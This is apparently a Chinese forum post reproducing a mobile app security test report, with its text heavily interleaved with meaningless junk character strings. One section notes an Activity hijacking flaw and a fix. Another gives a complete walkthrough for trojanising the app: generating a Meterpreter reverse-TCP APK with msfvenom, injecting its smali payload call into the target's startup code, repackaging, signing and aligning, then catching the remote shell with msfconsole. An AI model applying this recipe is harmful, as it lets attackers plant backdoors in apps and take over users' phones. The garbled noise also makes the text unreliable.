" E2 u) c# t; k& n- ?3 J. T9 `5 A   3 N6 [6 ]" A- q3 T3 ?# [4 w : m/ M3 A/ p+ E5 F9 T& H% a; c

5 E. N' W2 \1 L; x, X. o9 f! G ( g2 s6 t9 m7 D1 |! A

* |2 S) F8 r# l& I, p: g) ~ 4 Y. A4 }+ l7 O9 R 1-2 测试结果 . x9 L! n V. [# L1 e 1 I4 e( p: C# q* ]$ y

/ O/ }5 i; F6 I, y( k 6 [/ Z7 k1 u% s$ e! H

( ~0 r8 _2 v& m+ ^5 u' n _( d. ^& x$ E0 S   ' }& b% M/ J8 p% `# m0 Y- j 0 U. v" u% ?7 b

2 F4 k4 M: a8 ^" ~ " c! q3 y4 N+ }# Y4 `

1 p! [4 x9 ^" U& S0 { h8 `* h2 G. C: Q7 s7 @: O9 [ 2 检测结果                    0 [* N8 x0 z, g: m+ C . n p. I" _+ b1 e8 {: M

9 q2 I% Z1 `1 d; B- Q% a- I/ s9 s' h3 @

2 i/ g6 u+ K1 X8 F. e* N) f I; R8 j0 r 2.1 某某某 5 ]8 x/ j/ L6 [2 i! U; y& k 8 e9 W* o" ?1 k4 f. P0 Y3 z+ V

8 T) f# b- k! Y . @- A" I+ ^# l/ h6 {% b

b; x$ e7 U4 |6 I5 M8 a6 j : B0 X- x, \: N* O9 |" s% } 2.1.1检测目标 9 a. G$ ]; } n7 C/ `% g 0 o q( o: u; w, I

/ g3 U! e% W$ b7 H2 b6 t+ r' D* Q: S3 R o+ {3 I

& a7 R7 I/ D6 k+ b$ w) @) ~8 V) w, x' R8 e$ B3 { 目标地址: 某某某某某某APP 5 ^' l, m$ d F/ h( F' e( ?( Q& H$ w) X! {1 m& B* \9 Y. L

f; f/ L# H* R( J, w# \4 F # B: I) o0 k' @! P

6 W# I# k: y7 T) |0 |7 R& p$ L0 {0 p2 @: P 2.1.2检测结果 & B3 W: d% u# y# N& U. ?& N* R, z! p: ~9 Y3 ?# E

2 Y( A% J! U2 I* a) C E% r& P0 e2 b% a0 C$ m! {/ J' F

% Z9 ?+ N$ l0 v) o; [ 9 l! v. q5 X9 V( D: u5 f 2.1.2.1 4 s: A) o) k! Z6 ], x7 h * k& u: M6 n4 }

6 f8 K1 R. d5 V& k) p, I5 c" u3 g' f0 c' d% R

/ y, j0 g% f+ C6 l - U5 l+ I7 i, f6 p# ` 漏洞链接地址:某某某某某某APP 7 o. }0 j4 G; X" N/ c* K. J ; [3 {5 {: ~( ^

2 Z( Z9 u* o- m- _! i& n - [) d* S+ o' G: x8 e: d

/ b/ W' k+ `2 c$ Y8 ~8 v $ \- t9 h) I+ t# _+ ?# Y/ q   & L2 t# N$ w$ z8 d. C" a# b6 o: _/ P. L

6 t; E" A" R, G# F- f7 b+ F1 f2 P$ f4 e; v8 g8 k, E2 n, f

# p" E9 X2 s+ t* b/ Z0 o& v : Q9 j0 Q5 n5 ? 漏洞分析及取证: ' ~$ `5 c- `) y, }4 A; M* H9 H0 b# V5 J" w# C* Z

; y4 X4 m Y) Z% k! \9 e ! F; V2 G( i' X- O8 M7 z

$ M" K. U) v) R: O$ l7 y7 z4 R9 _ 5 V; V- G- U0 t6 \# }                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 9 Z6 L. m3 B. {" I : z9 M$ ^" k0 ?& m# n0 w2 v

. Y$ ~9 O$ F3 C6 D( v / M3 v# U! n2 X' I2 I3 L* g. i' `

9 X7 B2 n' M3 n' @5 r0 R . S! @' Q( G3 Y' L5 P8 g      : ~5 k7 C1 o l; @8 q$ l- _5 c0 l5 e3 W) K' o

1 F1 d5 c2 p' X( i . R0 c% e: f: S' K( J! w

: n/ |* D" X) S1 a# b% {, i) r 5 H7 z+ u* n9 h7 Y; Z                       . s+ [7 u, H2 ~2 l( }$ K & j1 o9 x. Z1 S0 b2 b7 ]

0 i7 D2 ]5 `5 @7 K* O " E- Y& s0 j9 F' F. ~

C! O+ L2 t2 X- R3 V0 a' B, r5 D T p2 }0 C) h$ g $ y" [0 [" C% m w1 w9 q 3 B' f' p$ y" p1 J! I" v- n

- r- w8 Y$ i2 I/ R 0 f# @4 |8 ]6 D% r% N

) U, L& y8 E$ R6 _; H ! e# _8 H- k1 [- r2 d 2 h- P6 Q. D$ c% \7 o. Z/ { 7 g2 Q \$ d( ~8 v

2 |9 V1 W7 T5 P: k3 G% r ; @4 j; ]# S" |/ t+ C- R+ A/ O$ A n

, O* G- M9 D( x 9 g$ S3 J' \1 o' c6 t- b 2 N0 g' W% u) b v! g9 u7 Z3 } ( L0 d' p0 [# k. m* f. J

1 x; i; C! Q% T( Z* d* r G4 T% n) \' w5 V/ g

- o. B) x* J/ y# k$ r- S7 T/ @ / L$ a4 ?" F1 ?% n 漏洞危害:高 ! p m7 }' S2 L- h5 Y; g9 P; h 6 n7 U& E9 n8 F( |% \. y$ W

^ y" z0 h1 C4 o7 [ 0 h A+ _0 }, E+ e6 F2 O8 G
% }$ Y; M! \! i# ` 4 m. S. F% y- T1 Y . ^2 _) K- I' x( I& z4 v! R' W/ L8 w- l2 e9 e7 `3 r+ _& _& C! G q- _) [4 I/ Y2 p+ }; ]! }1 j/ J/ ?- e6 J* H$ |4 U# `9 P- f: `% Q: `% ~! Z; R# [1 k4 r$ ?- x. \; A8 ` r# M6 B& A; J; |2 |7 T+ ]! B# e- q3 m9 f, j9 Q3 d' y+ F4 r( X- `. R/ \$ k2 D# y* w- [+ s7 s# b! F1 z8 i: n9 x$ M2 z1 E# d4 ~" M7 e6 z( L0 x( u8 |% B- j3 m/ J5 i8 i# `. Y& \5 N6 l6 {5 X3 G" c t6 B5 z* T& z1 W# F' c* v% B3 [& d+ ]0 v, _8 K0 R6 C3 S8 A, i. }/ |# |6 ^! J% w3 P2 {6 r. F: w1 B% H6 H. Y0 u+ d5 q) k* ?4 s7 g1 M) ^& ]! u1 e; H' T6 F; n) T: v k8 c, f) R" o( H" k: d6 L/ P h. Y/ l4 | K1 U( U$ |1 r) N3 S% z. v% B' O& K
8 `+ V1 [ `# X9 |% c/ P+ x 4 `9 U$ y4 h5 h3 C$ p/ _

9 j9 f+ u! T6 n8 ~4 J4 N. c' F6 S# u9 d7 q0 X9 N 严重程度 1 y7 v$ k% j2 T, ~ - V4 V/ P( d0 m$ `& ^4 V- x2 ~

: z2 c% x: G7 a- m! R1 Y. {7 D7 M / v/ m9 W: v/ M2 i* n 		9 X! R/ P, ^ a" k$ u- g7 P& @+ u0 y% u

4 W4 o( x$ |1 N0 ? 7 k) {& |! S+ v3 P7 C. N0 r & F( @& S; a8 G% j7 n 9 ~+ M$ E r4 S) W t

0 g6 _$ ^: k3 }6 {: e/ O7 f7 J: R% Q1 V3 V2 `+ q 		1 l% ~+ Z. r ~( l% B/ ^3 j4 n , A+ R7 T2 t2 k/ T4 E! D# i

6 f/ H" Z+ [+ v. L 9 X( Q5 T3 R9 D4 Q7 W ' h) }4 S, } T% @& N * u: ?' S5 ^- Z! {: J! @; J% N

0 }6 y7 P( f" p+ H7 I : E4 K4 P7 z' _$ S 		* P2 l2 A8 F' q( ` $ m9 u+ D& U& e5 I) |$ ^

' C z1 g% P7 J: E% `. h8 Z. \( j* z & q7 o3 e J2 n) a% I& V1 A & B7 X2 F0 w! o7 Z. G, ]& ?6 {* O

' r* j& i3 }; s( j( Y $ B4 E* ?* I3 l' X. T0 t; i 		/ ^/ ] M8 r8 D3 j- J. x. M$ @1 m8 s& x7 I; d+ i* Y

6 _0 ]+ d1 e! @) k1 I- L# C ; t$ e' j" I e   8 A9 h& ~9 z% u! [: H+ b, i0 K ( Q7 B1 u+ a6 l0 {7 v) q1 b

: O/ R* L. G Z$ I8 Q: l6 M ' O( z: B4 a& J6 ?8 Y 		z9 n; d' X3 }8 ]$ d) q' ]# n+ L4 f3 [4 {6 [; F' Y

8 J5 \/ J- `# z' C/ U% M8 h& k7 E2 U, ^: p/ Q 6 W- d5 z* g3 Y. Z, M- v9 O' s 8 `7 J* u( V% }+ ^. v% ?# |; F

& z6 c; x, b4 ^/ c) P6 w/ f" ^" Z+ g ! d' i4 h( }8 s5 B0 V 		5 m/ E& o. f& ]8 L' y1 L# _9 e& B 6 G$ y2 H+ x7 U+ k) N" F" r* S( @

3 O3 y0 K% {# X' j3 }- B3 l6 y + ?7 O$ n1 d$ ?% E   , v2 `: K# Y Z- t : y, X/ H9 _; R2 E0 O3 k

& k4 w. [9 C6 G& O * T! }1 o) |, } r
$ X( {: {' A) T. _& p# `: X ( Y; g+ Q6 Z, a, {: d6 h6 Q0 P
6 D$ }: d. ?, y" X ) |' Z* f; b* f3 a% d. \ q) `0 @

/ n' _. w. s5 I! W# A J, V. k 8 A/ n/ X ~2 c( B: K1 O: W   . a7 U) w1 H9 a ) h( ?5 X7 F8 q( I3 r5 t6 U

+ H1 a$ f( |3 W # j5 E* Q/ s y( |3 d9 d P0 Z

! v. w' O8 }( H; G& ` ; B" R. E" q1 X5 Z% a 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 @' J4 V: F \6 Y* ^ 7 Q4 J0 v s' ^# {4 g0 H* p6 R

, `- C; V: ^- S 5 t1 q0 {' u) @2 O

! T' N6 H1 R9 m; w6 ?9 J / [6 K( ^( G. y9 D0 L           , A8 \7 X6 H) G. X- { , `# A( w% E& R

# T# }4 K2 Z: `! q) c% G/ J& v. j4 D9 Y$ O9 [

2 k; F( k2 u5 x& J' f' F. F / K: _. V+ n4 `# P. K   , y) w* P3 M% t) Z 3 ]! h& o+ |3 V

6 e8 i/ w, i$ {/ V % w. C0 i' z, B$ {

% r6 T# c& }% T! c% D ; T! t8 I* O& i3 P, M 2.1.2.2 2 R: }( D f; F$ h* b - D5 P/ I3 [8 J P7 o

9 O8 E8 W& b: A+ Z Q $ L E7 U; f# Z; V0 a7 E* U

2 @4 N" Z% K: n/ W. y* S! X3 K4 @ 5 ^( n3 _0 T: J$ U1 k" {& e! ] 漏洞链接地址:某某某某某某APP ' h! s) h. Z! s2 W* I- V0 g. P. z/ @- O

( m9 y) U9 E( u$ Q5 Q 8 t$ E! h7 `0 \: `4 j! o

2 E0 M5 }1 F- _ 2 F! M Q- E$ {" a' d1 ], Y; _ 漏洞分析及取证: 7 g( S8 M6 M- T2 A; {& ^ 6 P% i9 h& X" }/ V

7 H/ {; q! s" E) @. J& K# E! t7 S' d( l! C# J

) Z% T- U* i7 B/ U% b4 E& P) f# O/ i- ~- r7 l                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: * V, y" m9 k* h ( R# M* q5 ^" u

$ m o9 m4 L% A% q# {4 q9 E 3 r3 t( A! y9 o/ x1 J/ |, A; C0 O

0 Y2 {% B3 V2 k; O, v) c" {# a2 q7 { Metasploit 生成木马 apk H8 R6 h. ]( C4 w ! Y! B% L" P1 S2 }- a& |' V

4 @" G8 O8 m" d9 B7 b% x X 0 R$ R# H3 O0 v3 L- j M# T" }

4 R; w3 \9 d: a' P+ O/ i5 o 1 W. \* k* d0 J1 t msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 s# j( E! v. r }% U2 V' o7 K! v' u( t% F9 n

4 X( j k. U2 K/ A) \3 u$ `4 b1 P- q/ v4 l* R8 _4 B' N

- v0 p( J# j, s0 q2 V $ V/ F$ `3 Y8 `% } ]$ h 反编译目标apk和木马apk 4 k* F& r# [6 d S 0 h0 @* r; Z3 v; ]7 ^

. z, {! y8 N! p7 {. \ & x% `1 g' j: \" \

, a$ y; R4 h$ B' y# n9 B7 C; G0 n+ j- p% }3 f apktool d target.apk
, |* P; i) Y$ \- R- ^* v3 D) f% b apktool d cockhorse.apk ' W t; L* k: ]( Z! o; d. c 1 s+ K1 O7 D6 e' I$ ?7 D0 U

/ t. H2 m! G: V# s0 k+ J" Y; C/ y2 o * Y% P, B2 |9 W! |) M9 ?

7 E) K4 w0 m5 l1 g- L" Y$ t9 P0 I# k( K' t; U N7 e 木马 apk 注入目标 apk ' y/ H+ H4 l/ O1 v7 a5 I 2 c- J. g' X( Z- D& B

2 R4 k' f1 K: n3 F4 S # ~& a2 o4 [* H- ^7 K; F

8 _ ]: y H8 E( B 3 }' ^4 V2 z+ g 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
5 z/ S" G4 W) i- I 6 d; x' |2 y& O) Y: W$ H! b invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # b: \, ~) N% o2 D 9 e9 y+ \" w( t8 }

3 D9 i# m u: S8 d& I4 q0 S: J$ y( I/ L( s" m1 g* K: e4 Q

+ W+ E+ d+ E1 ^1 }& o# o% z7 t) m ! B, h8 e @. n& T+ e 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 U7 z( z" R: @, [4 j ! Y( h2 p4 r% q9 d6 C" x: [

) q0 ?8 g( I0 ? 0 X/ E: {4 L6 G) d

4 Y/ u+ F" K+ G/ r* }3 P5 _ 6 g$ e7 \6 k8 u# o: [+ p 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 6 b1 ?3 ^) k5 K" t: x: J ` B7 A" N4 d- h4 L8 C9 N

, K r% @( m& I2 u& ?! a $ B2 z5 S' w, S7 A4 m7 `4 m

" B! T4 Y9 J" h% e ! D# f( [8 }+ r& J 回编译生成最终 apk - ]. d" f: f6 D% Z, ~6 E - m1 y, Z$ V: v& O& P ?3 G

a! N! m e) X, M( f( j6 j6 n# D* Y- z1 G

& l: V7 L A3 I 4 j- P8 P2 V G T( N$ W! M 重新打包 4 }: c9 W, D1 T. g' w, S9 O7 W( C7 C# c

/ s' F) T0 Q% _1 b7 t& s : y8 A) i9 |$ N1 ]6 B

3 t, b- G6 q) B! N1 `; ^! n 1 J0 ?7 a2 J$ M2 ~$ T7 Q* n apktool b -o repackage.apk target_app_floder * e0 d; V% T! E7 N" K" j ? : l" @0 T! M$ ~. _" B

7 e+ w# K$ ~. R- c" Y5 L2 S * J, _! H& m, m# o

9 R" A) ^$ _% t9 f! o8 y ; ~- `9 E3 L/ }% s2 h 创建签名文件,有的话可忽略此步骤 : t6 ~1 ~* ^( R5 K& Z 0 N8 z4 r4 Z# ^6 y0 U$ z

- F6 K; A. u: A$ ] * q5 j( S, t* B$ ~. D

; K% O/ n8 z$ d* w- B + n% e# f0 X7 ^9 W keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                2 |; _7 P0 E& }- [/ w9 t2 T6 w' M 4 J8 X# ]6 o. f3 c2 | ~

9 |, ` q3 k" l0 w, B$ j 6 F o, T. R: E

( w& J7 l' H" c. s6 A" o% A. r0 E8 Y 4 q/ E1 g/ J6 b% w$ l7 F6 S 签名,以下任选其一 3 S" C/ }8 {" K! p. k3 j: ^* v$ w; K$ \- K% p& w Y @* \

) m$ X! W1 v: \7 P4 s; | $ O( _8 V' [! Y7 p2 C

1 q& U5 k0 @5 U3 [' R; o 5 F: o- P: V; y' } {% N3 |" Q jarsigner 方式 ; f T% K8 ^, [2 D 5 \* t5 ?( u; k9 ?

( m5 f" @6 Y* Q! A0 S 8 t9 M7 @# b; a8 |6 F/ D+ J7 b

- ~9 h; w& C3 |- _3 e ) I8 k7 x6 Z$ D0 b8 ` jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) m9 I& S) y- Z0 R 4 x0 i2 P9 U1 N

' W$ |4 T/ k7 ~& v / t7 I5 T% s3 f

* V6 |. ]9 a) E' N- ^, O ' s/ s, } R* m apksigner 方式 2 Z* H W1 V5 r" d$ }) I! G5 H: [8 w1 \& f# z( {" k0 v$ g

( L0 O* T2 \! J" k ' m1 A I/ n$ W, w2 f8 Q! T

9 d" t, h: K, e! G, R) o2 I7 I + d9 `3 ^% p2 A$ B" n5 ]% X8 \" E apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 A* g* `* g; k) f9 o1 e* u& g8 g1 j5 J

( x, A* q. `2 F* w, s3 r! p/ d9 H7 m+ g5 y

7 Z+ j+ H* e1 t4 H7 m/ g7 f3 S 1 ` G4 A, o+ V 如需要禁用 v2签名 添加选项--v2-signing-enabled false 3 j5 d& [& @5 G; ` " Y2 I1 Q) l) [

) k* P5 y, K& f* d, [0 [* q9 C' ]! @ M

8 m( w; T6 ?1 H- l+ z5 W5 L0 g1 o: \7 g+ ]% m0 U; e 验证,以下任选其一 ( \+ z# e# X/ Y/ V# d8 l9 U * O* G$ u. j8 E9 [, k( l# `

7 |8 Q% n* f5 j( n z6 O3 |& R/ F9 d7 J2 n) Z

; I% M: d# Z- ~ Z* h% {/ [ # p& ]! S* s! Y6 F4 R' }0 N( V9 i( ? jarsigner方式 & o. q5 L5 j0 l * m1 a6 P8 {) Q# V

& w" y9 e l4 L; g4 J " b5 h3 k4 y) P7 y2 q: L

7 b# n1 M6 q w9 l5 Y5 g* c+ q# ?4 M7 `2 k jarsigner -verify repackaged.apk ) t+ C* B: q# r- t0 G6 h) K& y3 H! Y8 m4 }; Q/ T% c% p

& l2 H9 o- ?" ^9 }) j - C8 u4 T% f3 R

. ^6 d) A. A6 d: d& S5 } ( ~( H9 T- t9 n# H* o8 [! V apksigner 方式 & o3 m& N, p2 j. c, }0 N; H* C+ Z( l, d+ Z/ ?

# E% c: s1 U$ d& `4 U N6 t) _: o 8 d- @' L* w# _3 q4 L7 Y" B

3 a$ S6 s+ h/ C; k& O ( b( [) F- e6 Y" A( v& ?) x apksigner verify -v --print-certs repackaged.apk ! |/ \3 v9 C4 @, S$ k1 C) i- a! |- A% R5 G/ `4 i; |% L

# e; d, L) G+ j G, n * x7 Z& Z6 U) w4 K6 U6 k* \/ x

9 b% t: S( i; E+ G8 F( w! S + V6 s! m n& z& D1 K2 ]" I keytool方式 ; P3 o3 ]) {# x1 A 4 ?& I9 Q6 H4 ? U v. R3 \4 h

3 s) r! l0 t5 {4 D ; r2 k! q" k0 p! ?7 h

' J& I1 t+ S$ x7 @" v# v6 t0 _2 R! p: Z* o+ q# L8 ` keytool -printcert -jarfile repackaged.apk 8 W8 z3 z. r7 z: N. A, B- W$ [/ m/ B

_$ d+ E( b- _8 a7 ? / m2 V( C' E( }: h7 [8 k! g

, @; B, ?7 n6 ^: C1 v; t% z5 R; n ( R n7 Q# [: X1 W 对齐 L/ r4 ?' X) ]2 z + o+ J! G. ?1 h F5 Z L* d5 c

8 x' G9 @! Q3 k) z# g6 B1 j5 d% V( }0 M. p# s {; O+ l

r& f3 J3 `9 H7 v( H7 m: r! s1 D5 x" P4 x 字节对齐优化 ( c+ H$ r$ H' g" m( j7 w2 D* _

5 H1 @% j2 B9 [- N' Z) e$ a 7 n; B8 d8 F5 l0 \9 w0 c, r

$ i. z. Y) E2 B3 L" m5 C3 u6 h+ M- \1 S5 N7 F* a( p zipalign -v 4 repackaged.apk final.apk * U' j" j z( ?1 h$ E) \. Y & z* F% s9 s$ R% q$ K

" R! R2 {2 I3 f+ i , O/ c ^7 h2 M6 i& j; |

i; q) T4 k% }& ]: d2 D # P2 q. [/ ^ ~4 Y0 g4 W0 _ 检查是否对齐 5 J U! A1 }1 D: c: x . @5 V9 N' D+ R9 S- E' p

6 I4 D4 I% M6 J& S " |9 T6 w0 ?# L! T1 ]

4 A/ C9 {! ?. O1 i + V" R: Y) N0 p2 \* M- v zipalign -c -v 4 final.apk 1 Z1 K, _( v& q2 b9 \: R: s4 S( u) N0 O8 W! X% R" Y0 E' s

$ h5 D- ^0 b/ ]! ? $ {6 Q2 `" |0 x9 s D/ ]# F

4 ^( u) L/ d9 P3 c, K 2 C9 [' h X& v8 |$ ~ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + X1 d S! k, A& D- y" N7 M 4 a- B3 _( y* T$ c* H, f) A+ o- N7 ~

: o* E, N3 d* [" x, I0 {0 D 4 _2 O7 o; Q1 a

2 \4 f9 a: L- k9 U2 h& N. V- y$ g# ]3 }+ i B 启动Metasploit控制台,配置参数等待上线 5 [. K0 Q, }3 b) m, ?3 x) t* {( R 8 C; f" c4 t1 `. i

: Y- L6 d( j! m/ {0 O4 d! |' \+ r5 _+ B1 x5 l0 C8 [9 a

P6 L- O7 a6 a! u+ c1 B; i6 \9 X+ W$ w( H! j- i 在终端依次输入如下命令 4 {* l. H9 H! k# F; m" d* C K r& t. l' C0 G; d

0 U& r1 }. h. } c ' ` L1 k' b ^$ h9 F2 q( g- G3 B

" r7 t- H9 `6 {# A! Z / Q6 f! \+ _. C0 C$ ?4 S msfconsole ' N( ?/ y& w1 l. M1 o# _0 _/ E4 ^3 _. a @! _$ |; P

6 B; ?' M$ I* B& z ; F) n! x+ f2 O: @9 W* Z

' w, a: l) ?; N( N! h* Y- W 0 }. w0 W, g* g+ N4 c j use exploit/multi/handler ! V3 T* m V+ d) _% D ~$ u & v8 Z* a. y, z/ i* A9 @9 S

: u \7 `# _8 \# N 7 t, f2 }4 _7 m" l* b

3 l) ?# C: F7 `6 \- r3 J6 E2 K E+ b set PAYLOAD android/meterpreter/reverse_tcp 9 F, a J ~4 V1 F % w/ @$ N0 b7 S7 ~' }

5 k! F9 t; L X/ P 7 O: q! c* k; x$ M

# ^$ [3 W6 H/ [6 J; g! r ) ]9 E6 K o+ a2 V9 u set LHOST 192.xxx.xx.xx / a! Y* E$ a4 v' U @; r! d' k2 }0 |/ {

8 |; Z$ M/ }; y# a6 y1 P/ t 1 c* P$ Y$ H9 r8 x

5 O% D5 p; r) D* _- M6 n; S7 d ' S+ h5 d+ r& c T9 c0 _8 q set LPORT 4444 - U5 L' u5 y7 ` ' Y- \$ F1 r |" | I$ v

" F( v9 _8 E1 o" O + g2 N5 @0 u9 J1 d3 b/ |

" h2 l4 D f( O- u3 M1 N: P 8 I3 M) q2 V7 P# r3 F. v exploit ) o1 V" `7 r! C, ]' c4 C% M% ~- u2 }: G8 m/ w7 U

& ?. Y! C2 U j! [ B# q( M. V# Z! U+ M

0 g9 o0 Y, S1 O1 M4 }7 v! W$ B 7 x9 t, A+ r6 S: r 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               5 R+ n5 l* i) F& |6 V: F' l 9 X+ w% B: r0 v7 R0 m1 {( M9 T

; }$ |+ f- b- z: s 4 l z0 s- I! N9 I

. _8 s! U' y+ j! J+ q0 N% j; h ' ?. \- J. f K. F4 l 漏洞危害:中 , u% w# \8 P1 q6 _: M 8 ?1 S) B# s0 v! f

& Q+ D4 k! L9 r8 N/ |0 u, L8 T 6 d: G$ X- j7 X6 I6 U
9 g% F; I. f; z2 Z* x( a A/ b, j6 H% m8 ~, b5 O 1 f4 X& s) X) F ! w! X. q% G9 _$ u# M- L5 D6 V % \& I) v( p4 p6 [7 }+ P4 C+ p- q- B5 ?$ i, k; I# r4 A: [1 I; L A* |( j' M8 c( k( a0 u5 Q" Q+ ~4 r* d: u; [7 W, D" g, d$ u C) U0 J9 E# ^0 B; r' \4 E, Q: u# Z! F5 P: r6 [& Q. \+ E* Q7 l7 e/ | U; m: A' d+ S5 t0 [, x4 i+ i; L) T2 `. }! f Y7 j( C {. Z( O# ~: l$ i) H! V( b1 ~8 m. O5 J2 F0 q6 ^( V- l7 m' K' K4 r" ] e* s" z# J. z* e) f6 q6 l2 A) z6 R! y6 O5 g5 J2 M3 K! L% g: q! Z8 o2 A8 J9 q7 \) x' p2 L& H5 m: v- v2 R5 U# ^" l+ d6 B; L9 j6 X9 U4 |! Y- F0 y' O2 m0 `2 R9 z6 t0 d9 p$ n$ j% p# R2 ]5 W( ^8 @2 F' t7 B- r' ~( v% \% c! B' U; D( p5 X2 {8 M* `6 X% u& Y2 |7 b% t: o; q8 O- z9 n0 ^ V7 r( t
* m6 V- v( Y6 @/ j: H5 g+ ]; v* T* ^! j, M) Z; }" y4 N( p

J6 Y8 W0 K7 p# V: \ s' B5 q& _' r, f - ^' H+ G8 I9 D- S2 | 严重程度 0 N6 b( t* U3 o7 z5 g( j' ]; f2 ] , B3 }, j8 o$ h3 a! B

4 _: e$ O/ U9 N& y. \8 ~ ( x; u1 y# c, R8 u Q0 u 		1 H. Q2 j: m+ i* w' k' E$ K' T* M/ \6 r9 Z: T# D B

k2 d2 l$ {3 g/ Z' N% Z7 j9 d5 z0 Y0 D" i + W0 s# K7 M- P. W, X3 @ ' K8 j$ r1 h2 V9 m' d- S" F4 F

+ F+ p3 x1 ~9 U- f# y 2 B6 C4 f* b, x+ s1 ^: N 		$ Z( L+ w6 ] r6 G- P! r1 a' I" K& {% |

3 {4 v9 z' O: }% v' z% w; a9 @1 n0 U 5 R* j& l; a( y' B & `! p# ?& P( ]1 A/ P" w, S * p+ j, o3 m2 m

6 I8 E$ ]) Q1 d/ h ] * Z/ y: [1 I0 j4 p9 d2 u8 q# v 		6 ^! Y+ E( q! S! V" I # W s3 c0 U8 b) d

* u6 }% o9 N8 _ / ^3 v, K5 z" v2 X% Y# b 6 q1 k7 I. w. C7 S' b6 q3 T& O3 b# B+ B8 p$ q5 z' ^2 [, t4 w6 q, s+ M

, a7 u0 ?8 k' s& z 4 P) ^/ ^- P F9 j# x! q 		6 h" W& T) `+ q% M4 P 1 z6 V% c) a, A, A4 ^* d$ G7 Y ? : k' u: f$ N+ x+ t 0 h; v2 M. B3 N; z

+ t( {* Q" [, ?! H+ s& a ] % u! @: U0 M4 Z   ! K( c+ z* C3 ?9 k/ b/ ~! B 3 Z0 ^/ T. V( Z# a: v

- _8 l W, m) ?1 t) E1 ~0 I" k 3 ^) e7 U- r# ]: V/ {- f0 \ 		2 C3 J6 S5 M( e+ ]# J 0 a: R6 j5 i8 E( @# t# c5 |

6 r9 ]8 h/ R" l" @* u% z ; q% D- Z6 j$ [# B # c! [0 M. {) X7 | . `; C- c; E' @

' I: M& ^# @& r# |$ x7 R( p- R 6 A8 C( ]$ ^1 s0 g9 q: }3 c 		+ K2 `5 |& P# R' l # F/ I8 r( a, z3 u" w ) N5 r7 x/ V5 J3 t0 f . V5 E7 s9 m. C# o

3 g6 w# ~' q* ] . Q' m( D1 a* v5 q0 C1 P   - Q/ L) L4 ]4 m% l' l: c. L : Z& L7 _# D# ^! D

! I5 U6 _8 {9 C* x8 { ) h! b) U$ X$ @
* b' a* W6 d! G6 |9 A4 q3 z* q7 B/ k$ w, a e; t; P
( U) c0 G E5 w% x; L7 G8 y4 p: l / y% e3 Q' E0 f+ S# w

. ~& K" Y. u7 Y4 [, e* @% A! n # z" A" R( H' q/ z$ I+ @   9 m2 Y6 y% f w% s ! j8 O6 v5 V( g

1 q# i( d* U8 W# p 4 Z7 V3 d8 E( A0 l. t

# e) w$ Z* v2 F 9 B1 ]2 t6 h; c2 P: @, B 修复方法: + _6 ^$ r; {+ O" o, ?2 D . }8 @ B) ]( ^+ [# Q! p! u

8 L& @2 z7 _& X. R ; m0 X% D8 c8 `8 }

0 m/ r5 V6 m+ v- F) P5 k ' t, }% W A. N               1. APP 启动时应做签名校验防止二次打包。
) k2 c3 D# H3 T2 }5 {+ a% n7 F* X% k6 g: D9 ` 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / u: v* X" k. f/ d 8 k1 X3 ?% C3 y

4 v0 k: [" E" W1 [( Y 0 P% J: B0 S' j4 q 5 z3 z) _( b% V9 H. E3 f! K) p2 V+ m v3 S1 W5 M' e

* f5 |2 J- W! @2 O' [1 ~( a 9 x% O( }& ~! w) I& Y! f# \. [% A   & i! x4 \& Q# C D( }- ?4 c! i8 N! N( X

; `% o! X. ~0 u0 Z9 {. I0 H1 i6 W0 D- l! _1 ]* n 2 ]! ?5 H9 a: r4 d4 ?3 P 1 i8 N) f* w. g( q7 n E" {

' s. ^9 A- [/ G, {( s+ |# W ! n( ?" f7 s4 w, P- r4 P
* D; c$ S$ v7 z, B* f8 Y1 f. R ( u+ a" N9 b+ Z

5 g0 B- q/ ^3 J $ I+ a2 j1 r- @
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表